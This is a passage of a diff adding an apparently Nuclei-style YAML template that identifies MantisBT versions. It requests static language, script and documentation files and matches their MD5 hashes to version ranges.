type: dsl + name: 2.23.0 + dsl: + - 
"(\"b458e3868f56e08160ea77ed0da87ae8\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"6e0e368d89eb5542a59f69f92ca81961\" == md5(body))" + - type: dsl + name: 2.23.1 + dsl: + - "(\"36160a96d85a9a3ff100f925246a092a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.9.1 + dsl: + - "(\"5a63a186d118af15ae2359109716c582\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"876a93962696a4bea85fc87674ccae8c\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"fb9354faa67add7ffc107e87af330111\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"068e1c140e799ea2a0bf75db1bde45a6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"51e8ce04fc1b6527361de406db8244ab\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"2ea20d2fc5c310d889138996dc34cd15\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4f313866a196871e23ae0d56cb5e034f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"bc5adc93a61610c24bbbef0f08c60b6e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"00dc576ea14883c41c89e25cb3a720c0\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2050664376db29e396da745bdf3c1f2a\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.19.1 + dsl: + - "(\"56792e7970362a690b52e0d2eee49884\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"712752bc02b6bbf9af273d2e597f209d\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3163f817dfe6fac836d82f76931311a1\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"55c3b0151b8a561742b117888e1c8dad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"42b3071a7bffaa1ccc48812cf3f4cb26\" == md5(body))" + - type: dsl 
+ name: 2.5.0 - 2.5.2 + dsl: + - "(\"331aea3d962da73571cf0b59159dad24\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.4.2 + dsl: + - "(\"0d3cf694d248e8a84e39053a8b2f8c70\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"5b377da3a0d6848b21d419b1891cda6e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"16c3d78e3477981677301db4c3c3765b\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cd7a2aa37d0504a94a135396e1b693f7\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"a87e0a77d6efd8ddbc62733d528aaefb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9f111686f7969e02acbd86f80bacfa33\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"cceef93025e7bbd7d4d379f93432a23c\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a498c0b0c4694d39ca53b227b056c4f4\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"362efff0d984ec317fb7bfbe5e1957dd\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"297777dadf85192ff8ed8a5fb81663a2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"656f215ac5f27605321f8593e2895869\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d3937f2ad52c8d08cb86c3c49b6f3716\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.16.1 + dsl: + - "(\"cae289a04d53a5227ef5b78fbcebb4dd\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.3.3 + dsl: + - "(\"e98b22fed9d9da66727d1105b99b8fbc\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"c2cd59a848abc744d523a95bad777bb4\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"da029426e501a96b761c39b2e0365247\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1f30995c94d7d5306c0c49f710da2578\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"311dd5b0988647c00e7501fb072c3af2\" == 
md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"88279ba13af8cf318c3ca3dade752fe0\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"000efaea8761866c2ad82e70f91e3be5\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"2bf33a021c8a8c01897444897817c176\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"1bfa2bae41eb4c7f3bc297818fcf4b3f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a81c97634f1a6e73922fddf9721f4cca\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"4686e0fea94bab2ca75063811a6b4891\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"639206749d9c386940a2517a16216132\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.22.2 + dsl: + - "(\"f8eecad5b5d8395416524004b242955f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"59d96683044a63fb2ebb8ec173a40a2c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"947cf5d0e17a4e487766ff74bbdf1278\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/travis_before_script.sh" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"6dad2e38e3dbe34811dd26ca87a111c1\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"f99a04aea5f098890c96d7b322c2154e\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"ffa2617738a9018d4d726d5c5c737193\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.19 + dsl: + - "(\"22dc58c1ca34ee99d81b03a7399e9f6b\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.17 + dsl: + - "(\"fb4588194ace7feeb5d6645126dc88b9\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.19.1 + dsl: + - "(\"fc722a8fe9e6ca09c189c7ada9341689\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"76d7643f7a05154136a7bea7e5c1fad1\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"68d7412fe24b21eabf80641738a9edaf\" == md5(body))" + - type: dsl + name: 1.3.20 + dsl: + - "(\"bc576ad1cd7ac7b9e2e1b9a6acceaa16\" 
== md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"35716f4972cbc5f745c55794037bd50e\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"0960266a9cec070cc426abc43936b7d6\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c083654e0509e868b0baca60c4cd630a\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"7707714f5ccd42413e0c3471e45b5fc4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"51fd4057134edd88bbf26bfbbb340c53\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"38ae54d31031a31cd4c1704b4143f60f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"31beaa61628191d78100c4c02ee8fce7\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fa03c6da02e4e4e47adce8d3d5120edb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian_nynorsk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"6914496d0131d6276359e2655b205a1a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"945177fc6c26db83c585868a68bb6825\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"4ff52ca8ce4ea85c7132919258ecd1f0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3df1ab14b6a9162ce565ce535607d927\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.4 + dsl: + - "(\"8d7ee7f169d93fb544295b6d671c3ba3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b4cc629cdb70ff9c7ac32c982daefd4b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"a68371fddef097533b0965e31ed79060\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"eda4374d13dab0dbada0d816c710ea73\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"0d146fe58c2d323124f9a53f6ac63d51\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: 
+ - "(\"2cddfd3cd38b710c418a271c8534503d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_aeb.txt" + + matchers: + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"ef6e3a6bbd741065c674448297019794\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"b2a8961353c93bd666ec84803e83b262\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"5e39582e3c65a73a105af5aa78cdecdf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/customizing_mantis.sgml" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"4a93b9d27e05fd5576a43d5e4f7c40c0\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"890fabeaa183a1529f2b1ed62299747e\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.14 + dsl: + - "(\"293b874f08f7d9938a30cdc8b2ef7aa9\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5b5add108f524f903785668ae0ba2dff\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"302643f783cf9a1ce0d5529a38196c95\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7eeffa72fcf2184cd43c1b476e7dd7de\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f5451bda548fb3d28af244a9bb5a998d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"eebcc5ec8a7f99dd9381189e007af38c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6ee3f6b55bc452e6b059e23497bcdd5d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4211062c360d02038698167144089ca7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"41e60c9dfbe0f7c9dba25cd779df047e\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9163207ce27c2990fbc3ae7fe2e16594\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: 
+ - "(\"8fac11c171015c03852360d437e66e07\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"05b45cca440954cee0f9105248a51b82\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"de205eb95d4d67b86fd2f5b158d54cca\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"16f9475057b7d4674b464950e8a5bd1f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d5498d6cb82eff660aa2df24a6dc5f4a\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"45d3407cee1107f3610deacd201bf415\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.16.1 + dsl: + - "(\"6e51b596d0f1d7a8eb3b44ac2c21ea8a\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"a0a368537643fffbd90e42cdce510fa0\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"99705b1b122d0422280d3b7b400e6693\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"73193183ed6797b9fb8386c6964987ac\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8499372f4b42620c53294e4e3555506b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"230241273dc324f87bcdf361bf01730b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a1bea1c413ed79e30ad142f83df39383\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2c8198cdf7fc7e717f755601234be203\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"0a7488744c1aee3d0cc6e03cf85433e3\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"1a6332a6dc7ae32ab98bf26e0fdaac8d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"86c5f7c0bfda3358e78dffe999ecd6a7\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"c4bc8254b7b64d2e07b75fdcb2d99941\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + 
name: 1.3.0 - 2.24.3 + dsl: + - "(\"c22fe741a1d5bb7c124f0c1242839864\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d55f0fb678b5aecdd97442b36a29806c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6fb673bb1aa8917201f6fb158833b0ac\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f67e6b38bcd3251ded2cba8c5137fafe\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"468c70cff081fd296b9d48559ddc3cf4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2adda93d96d32c92cd5a31d3975c6e0e\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d0bb8bb95480517df9c12c6bfdd0891d\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"dcaa789ba1b88337d3f13a05de4206ac\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"99eb700d0cec54afdb6350eb9e0a25a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"65d0423fe436b4b15aaee0e3407e510e\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"eb699dacbc5a3cf8d278a1f84f2e7a49\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ed53e9bebf562250c44b865b7ac46065\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"c44fd0fe73ee0bb6c8b052b2c9a1667b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8ca64b0ceaaf56824271fb74f943bd0b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9837b6bf7aea1ccc1d5d5df7fda60034\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"ff432d42f3f8698797ee2d699d380d18\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.11 + dsl: + - "(\"34ce20f3d95208f1f8a7eabc65ba34cc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3a30d4fdf820538e0dd4c74eeb474c54\" == md5(body))" 
+ - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"51acd5095f9666c31a624ef8db6cd55c\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"3b01dc5f60ed4962a42e533d48b216e7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"259ddf1eafc9318377477982418a775c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7b3e2385b279f16616fc3e8eb67fb9e1\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d417b5ac743e137183f93afce5edccdc\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8b765dc1413fcc4035e89b55ce438187\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"a148aa1f727a74a74e4a22f6a10e501d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"fb59718985ee092fa0b106891b773427\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"e8b3cbc1132c46ce540eb5c289cdc09b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0db224194675214a3ab1bab5c95123e6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a7dd0be430bdc61379b0049330e168aa\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"02b79dab1a36a3561931d355a33f3c96\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"bc124dc6ac21626efb808b950c61d391\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f368d70b56200b0979057c2e18aeb164\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"282c1d113f5489d8fad4a8344915d843\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"038ce7fded25642361a211361e0e5140\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"eb18311315a3a24fbaf80a97f07c7093\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - 
"(\"fddb5f43a058d367158542839df48aff\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1fa6bf28da38c8e91b40ea6d69896093\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"9245ed17b72a269fd7ac87659d46c996\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"04b8f22ca24722a97be2f52b2fa611db\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"d237c08bd9f06b62aa4ef139a877754f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"e3276d38128340b0adf386260d52d8db\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"375386a2ff94c75233f4737f06eb4fd6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"445da976bdce48a5ebbd5c095826ed3a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"998632ad32ac75fdc9c841e4ba1518c5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a17969ec39b238857a16df256c4f444a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"24f5267ba80b5c068d425cdc5f650384\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"866445ea4853329daf5a54e2f14368bd\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8775c75982d332a15d28ee923b92425c\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b4a42508d19495b36dad7d4c7b9db1c3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_english.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"88c2ac116b26f5de5e62ef9c2462aa99\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"8b611b59a280a2bb8ee0795868272b3e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3a9144619393c5362a945b184b2543f7\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"1546d055b70556610819394748e89833\" == md5(body))" + - type: dsl + name: 1.2.18 
- 1.2.20 + dsl: + - "(\"aa9ea61083b18f7f893b85cb151a1dcb\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"29bfc25c783f9aeb20f9bb1061261b3e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9ea9d028a153f21d6c870d6234388498\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"19781ed227c88412715629fab8447d49\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"2e9c021750b05a172cdd9bd01c8dbff2\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"abb2ae3fc3380d661ad5ae319e9c0fb3\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"44e81799da1ced6a7bda5d32c65b7716\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5c2b7a4dc659962623c442628b88c81\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2e9518a12f30680f55a2c8bc26f2fc61\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"b3f8317a5623e9748bd3d91495db4645\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"dd6d5dcee396140cd914b2a97801c85e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"6ee197eadd318905440794e2b2c997b1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"efe6e03dddae06392ba6bc5f1529994a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ea58338d341fb19e98b620a74f6adbf1\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"5fb548931e0d909bbfaaa50f8d9b7c38\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e21df94c56edbb739a1a3bb9138bbc63\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"3fad580ebf1501655e460306c6c9bf3c\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"3642edc58c2beca26bb825b07a8668f2\" == md5(body))" + - type: dsl + 
name: 1.2.11 + dsl: + - "(\"aee6d05d38403284d7629d18c431925a\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ba7f8fbe5b37466f6132e25ac49419ea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.16.1 + dsl: + - "(\"ae1f83a7e662a3abeb40f099ff5fc9ea\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"88c90e7d63148fd1c35fb68a96f07aea\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6274542ed8bd196778170e42233e3859\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"98a3f4df63290e9e930c829c946d3206\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d033babb678cfebc13cdd157fc0e2a2b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0fa03e4fdb279a538fbe323c7eec104f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"0216e6936a808231518588677805add8\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"da3e7b7ab29d04dbaf7676850cbb9543\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"e5ffc337ab594cd9aa4020e8222f0789\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"8e248e7fc1efed76af14c4731c874efa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"de8f814a8d48193e14ac15afed27a2cc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"4ef4adb6148cc9f783dfcc794e3deca2\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f7f2bc25fdf98034fcd1eb40e460782f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"6914f159931a7408dcf634783bf2f8c7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"00b9c1632e050ef4bfcef4b494fe6f16\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"1f5d70db9039dc8b07bc2dfb4c06b8d8\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.16.1 + dsl: + - "(\"78defcb70381c0deba2577a2b3246321\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"ae330fff674fe8e2505c984fc1ff7991\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"0fe69dc7bc439c5515d5fce4dd960ed9\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"56b2d8025633b9874f9861c1cf763850\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f2c98d3365de10b7a9a0a52170cbd8a0\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"be6dae83d268af63bd4a52bdb814bada\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ab8d1f36a8a257852dc01328d5cd8b01\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"634d72c350a9767be728a3fac4f53241\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"7e11d106e913cf3fef62f1c02cb00116\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2237e3bba07e2a3047733511d356cdc2\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ff6fa4f4ee820bfd96427e5c77e603c3\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"fe411fd9f4c57a76691f4bb00dbee2e4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"e68c60ab6cbe3d2ffec4e6a52a0082bc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.3.3 + dsl: + - "(\"c56e2c2172bd2741fe21fb47652e66d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"31a8d0054be0b1382bda51f43bab7348\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"67182b174c84f60110870fbea036059c\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"6ce7bcbfdbeb233c53623b27aac12730\" == md5(body))" + - type: dsl + name: 1.2.17 - 